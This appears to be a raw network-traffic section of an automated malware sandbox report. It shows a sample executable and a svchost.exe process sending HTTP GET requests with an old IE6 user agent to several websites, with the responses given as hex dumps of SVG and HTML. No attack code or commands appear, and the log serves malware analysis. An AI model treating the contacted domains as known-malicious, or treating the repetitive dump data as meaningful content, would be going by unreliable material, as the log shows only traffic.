                                                                                                                                                                                                                                                                          Data Ascii: ,1-.91,2.6A2.94,2.94,0,0,1,543,276a2.82,2.82,0,0,1,.6-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M547.51,266.46a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.63,2.63,0,0,1,3.37,0,2.48,2.48,0,0,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5550INData Raw: 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 38 33 2e 30 37 2c 33 34 36 2e 31 32 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 38 32 2e 38 2c 33 33 38 2e 30 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c
                                                                                                                                                                                                                                                                          Data Ascii: 0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M583.07,346.12a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.18,3.32"></path><path class="cls-9" d="M582.8,338.05a2,2,0,0,1-.91,2.6,2.93,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5566INData Raw: 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 33 2e 33 38 2c 33 37 2e 37 35 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 32 2c 32 2e 30 39 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 33 2e 31 33 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39
                                                                                                                                                                                                                                                                          Data Ascii: 8,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M333.38,37.75a1.61,1.61,0,0,1-.72,2.09,2.37,2.37,0,0,1-3.13-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5582INData Raw: 32 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 31 2e 37 2c 39 35 2e 32 61 31 2e 35 39 2c 31 2e 35 39 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 38 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c
                                                                                                                                                                                                                                                                          Data Ascii: 2,0,0,1-.73,2.09,2.36,2.36,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M361.7,95.2a1.59,1.59,0,0,1-.73,2.08,2.35,2.35,0,0,1-3.12-.88,2.24,2.24,0,0,1,.48-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5598INData Raw: 2d 39 22 20 64 3d 22 4d 33 39 30 2e 32 34 2c 31 35 39 2e 31 33 61 31 2e 36 32 2c 31 2e 36 32 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 39 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 39 30 2c 31 35 32 2e 36 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32
                                                                                                                                                                                                                                                                          Data Ascii: -9" d="M390.24,159.13a1.62,1.62,0,0,1-.73,2.09,2.36,2.36,0,0,1-3.12-.89,2.24,2.24,0,0,1,.48-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M390,152.64a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5614INData Raw: 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 30 35 2e 38 33 2c 33 35 2e 33 61 31 2e 36 32 2c 31 2e 36 32 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 41 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 34 30 32 2c 33 36 2e 35 61 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 30 35 2e 36 31 2c 32 38 2e 38 31 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e
                                                                                                                                                                                                                                                                          Data Ascii: .67"></path><path class="cls-9" d="M405.83,35.3a1.62,1.62,0,0,1-.73,2.09A2.36,2.36,0,0,1,402,36.5a2.24,2.24,0,0,1,.48-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M405.61,28.81a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5630INData Raw: 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 33 34 2e 31 35 2c 39 32 2e 37 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 41 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 34 33 30 2e 33 2c 39 34 61 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2c 32 2e 37 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 33 33 2e 39 33 2c 38 36 2e 32 36 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37
                                                                                                                                                                                                                                                                          Data Ascii: 0,0,1,2.71,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M434.15,92.74a1.61,1.61,0,0,1-.73,2.09A2.34,2.34,0,0,1,430.3,94a2.24,2.24,0,0,1,.48-2.7,2.09,2.09,0,0,1,2.7,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M433.93,86.26a1.61,1.61,0,0,1-.7
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5646INData Raw: 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 36 32 2e 34 37 2c 31 35 30 2e 31 39 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 36 32 2e 32 35 2c
                                                                                                                                                                                                                                                                          Data Ascii: 0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M462.47,150.19a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.68"></path><path class="cls-9" d="M462.25,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5662INData Raw: 30 2c 30 2c 31 2d 33 2e 31 33 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 37 38 2e 30 35 2c 32 36 2e 33 36 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 32 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61
                                                                                                                                                                                                                                                                          Data Ascii: 0,0,1-3.13-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M478.05,26.36a1.6,1.6,0,0,1-.72,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"></path><path cla
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5690INData Raw: 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 30 36 2e 33 37 2c 38 33 2e 38 31 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30
                                                                                                                                                                                                                                                                          Data Ascii: 1.6,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M506.37,83.81a1.6,1.6,0,0,1-.73,2.09,2.36,2.36,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5706INData Raw: 34 2e 39 31 2c 31 34 37 2e 37 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 33 34 2e 36 39 2c 31 34 31 2e 32 36 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: 4.91,147.74a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M534.69,141.26a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5722INData Raw: 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 35 30 2e 35 2c 32 33 2e 39 31 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 35 30 2e 32 38 2c 31 37 2e 34 33 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38
                                                                                                                                                                                                                                                                          Data Ascii: ="cls-9" d="M550.5,23.91a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M550.28,17.43a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5738INData Raw: 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 20 69 64 3d 22 74 6f 70 2d 73 6c 69 64 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 73 6d 2d 34 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 63 61 73 65 2f 77 6f 72 6b 73 2f 6d 61 69 6e 74 65 6e 61 6e 63 65 2e 68 74 6d 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 6f 70 2d 70 65 72 66 6f 72 6d 61 6e 63 65 2d 69 6e 6e 65 72 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2e 2f 69 6d 61 67 65 73 2f 74 6f 70 2f 70 65 72 66 6f 72 6d 61 6e 63 65 2d 69 6d
                                                                                                                                                                                                                                                                          Data Ascii: iv class="container"> <div class="row" id="top-slide"> <div class="col-sm-4"> <a href="case/works/maintenance.html"> <div class="top-performance-inner"><img src="./images/top/performance-im


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          13192.168.2.650329188.114.96.7443C:\Users\user\Desktop\nhVJ8J5qOt.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:12 UTC264OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: hyab.se
                                                                                                                                                                                                                                                                          2023-07-05 06:07:12 UTC264INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:12 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Location: https://hyab.com
                                                                                                                                                                                                                                                                          Cache-Control: max-age=600
                                                                                                                                                                                                                                                                          Expires: Wed, 05 Jul 2023 06:17:12 GMT
                                                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6cuNC%2FUT3xapOV7l3iLnpRd%2BkAtAve%2BBkE7e0StPfH2v34XptgOxEP2hVumHod1uuWJlqGbphDkUG2FdPHJHMw9%2FLNLWfWuoT3xpBWX%2F4nX%2BqeD%2Fs7S03%2BXj"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 7e1d6d292f573a4f-FRA
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          2023-07-05 06:07:12 UTC265INData Raw: 63 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 79 61 62 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: c8<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://hyab.com">here</a>.</p></body></html>
                                                                                                                                                                                                                                                                          2023-07-05 06:07:12 UTC265INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          14192.168.2.65033335.214.171.193443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:13 UTC265OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: flamingorecordings.com
                                                                                                                                                                                                                                                                          2023-07-05 06:07:13 UTC265INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:13 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                          Content-Length: 75193
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                          ETag: "6459edff-125b9"
                                                                                                                                                                                                                                                                          Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                                                                                                                                                                                                                                          X-Proxy-Cache-Info: DT:1
                                                                                                                                                                                                                                                                          2023-07-05 06:07:13 UTC265INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 73 74 6f 72 65 2c 6d 61 78 2d 61 67 65 3d 30 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20
                                                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="cache-control" content="no-store,max-age=0" /> <meta name="robots" content="noindex"
                                                                                                                                                                                                                                                                          2023-07-05 06:07:13 UTC281INData Raw: 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 39 37 2e 31 31 20 35 39 2e 30 33 31 20 31 39 35 2e 32 36 38 20 36 31 2e 31 34 34 20 31 39 37 2e 31 31 20 36 33 2e 32 35 38 20 31 39 38 2e 39 34 38 20 36 31 2e 31 34 34 20 31 39 37 2e 31 31 20 35 39 2e 30 33 31 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 39 37 2e 31 31 20 34 37 2e 32 32 35 20 31 39 35 2e 32 36 38 20 34 39 2e 33 33 38 20 31 39 37 2e 31 31 20 35 31 2e 34 35 32 20 31 39 38 2e 39 34 38 20 34 39 2e 33 33 38 20 31 39 37 2e 31 31 20 34 37 2e 32 32 35 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 39 37 2e 31 31 20 33 35 2e 34 31 39 20 31 39 35 2e
                                                                                                                                                                                                                                                                          Data Ascii: fill="#fff"/><polygon points="197.11 59.031 195.268 61.144 197.11 63.258 198.948 61.144 197.11 59.031" fill="#fff"/><polygon points="197.11 47.225 195.268 49.338 197.11 51.452 198.948 49.338 197.11 47.225" fill="#fff"/><polygon points="197.11 35.419 195.
